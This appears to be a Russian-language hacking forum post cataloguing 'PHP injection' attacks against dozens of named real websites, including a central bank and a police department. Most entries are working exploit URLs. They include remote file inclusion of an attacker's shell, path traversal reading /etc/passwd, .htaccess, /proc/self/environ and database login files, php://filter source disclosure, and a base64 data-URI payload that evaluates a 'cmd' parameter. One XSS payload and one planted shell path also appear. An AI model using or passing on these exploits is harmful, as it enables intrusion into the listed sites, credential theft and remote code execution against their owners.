PHP Иньекции

Remote File Inclusion
http://www.svetyashki.ru/gallery.php?page= http://www.svetyashki.ru/gallery.php?page=phpinfo(); Konqi: вместо шелла пишем [URL]

 

Code:

http://selling-avto.com/index1.php?con=[URL]

Можно подключить любой php файл, например:

Code:

http://selling-avto.com/index1.php?con=http://mysite.ru/myshell

 

http://www.dmt-biax.com/i-make.php?user=dmt&vorlage=vorlage.php&file=../../../../../../../../../etc/passwd&newsid=1945

PR-6

-----------
http://www.ictprofiles.at/index.php?file=../../../../../../../../../../etc/passwd&branche=5.


PR-6

-----------
http://www.gusswerk.net/i-make.php?user=gusswerk&vorlage=flash.php&file=../../../../../../../../../etc/passwd&newsid=2250

PR-4

 

http://www.crusaders.cz/index.php?file=../../../../../../../../etc/passwd
http://www.peteralsop.com/index.php?inc=../../../../../../../../../etc/issue
http://agrofranjalp.com.ar/page/2/index.php?inc=../../../../../../../../../../etc/passwd
http://www.ratikaclinic.com/index.php?file=/home/ratikacl/public_html/.htaccess

 

http://nobeltec.ru/index.php?link=[RFI]
http://nobeltec.ru/news/data/upimages/dem0n_ra/img.php

 

http://alta-tour.net/priem_spb.php?id=../../../../etc/passswd

 

Code:

http://mardigrasday.com/mardigras/food.php?file=../../../../etc/passwd

PR - 5

Code:

http://www.kkm.lv/modules.php?file=../../../../../../../etc/passwd%00&name=Forums&p=256953

тИЦ - 30
PR - 3

 

Code:

http://alternativeautosource.net/index.php?link=php://filter/convert.base64-encode/resource=index.php

декодируем из base64 и получаем исходник страницы

Code:

http://nobeltec.ru/index.php?link=data:application/x-httpd-php;base64,PD8gZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=&cmd=phpinfo();

смотри в код страницы и видим там phpinfo

 

Code:

http://www.tybet.ru/cgi-bin/index.pl?id=10&artid=/etc/passwd

 

PR - 3

Code:

http://www.asictonline.org/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00

 

http://www.speakerplans.com/index.php?id=index.php%00

 

http://art.less.ly/index.php?dir=../../../../../../../../../../../../etc
http://art.less.ly/index.php?dir=////////////var/www
opendir()
readdir()
closedir()

 

Можно загружать любые файлы с сервера:

Code:

http://www.tuscanycable.com/download.php?file=../db_login.php

Code:

http://www.sosdogs.org/download.php?file=download.php

Code:

http://institut-africain-droit-environnement.org/download.php?file=Connect.php

 

http://www.arlingtonpd.org/index.asp?nextpg=/images/CALEAlogo.jpg

ASP-инклюд

 

http://www.da.gov.ph/newindex2.php?pass=/etc/passwd

 

это одинь из моих любимых сайтов, который я посещал в течении трех лет ( да и сейчас посещаю)

http://lprussia.com/index.php?page=../../../../../../../../../../../../etc/passwd%00&id=photos&this_id=text

+XSS

http://lprussia.com/index.php?page="><ScRiPt>alert('Linkin Park Rulls')</ScRipT>&id=photos&this_id=text

не делайте плохого

 

http://sims2pack.modthesims2.com/index.php?page=../index

расширение так и не смог отрезать

-----

http://www.suprapolix.com/index.php?page=../index.php%00

-----
http://www.opticaldocumentsecurity.com/index.php?page=../../../../../../../../../../../../proc/self/environ

 

Довольно известная мобильная социальная сеть GyPSii

Code:

http://www.gypsii.com/reader.cgi?id=../../../../../../../../etc/passwd%00

PR - 5

 

http://corporatedatinginternational.com/index.php?page=../../../../../etc/passwd

 

BANCO CENTRAL DEL ECUADOR
http://www.bce.fin.ec/docs.php?path=/docs.php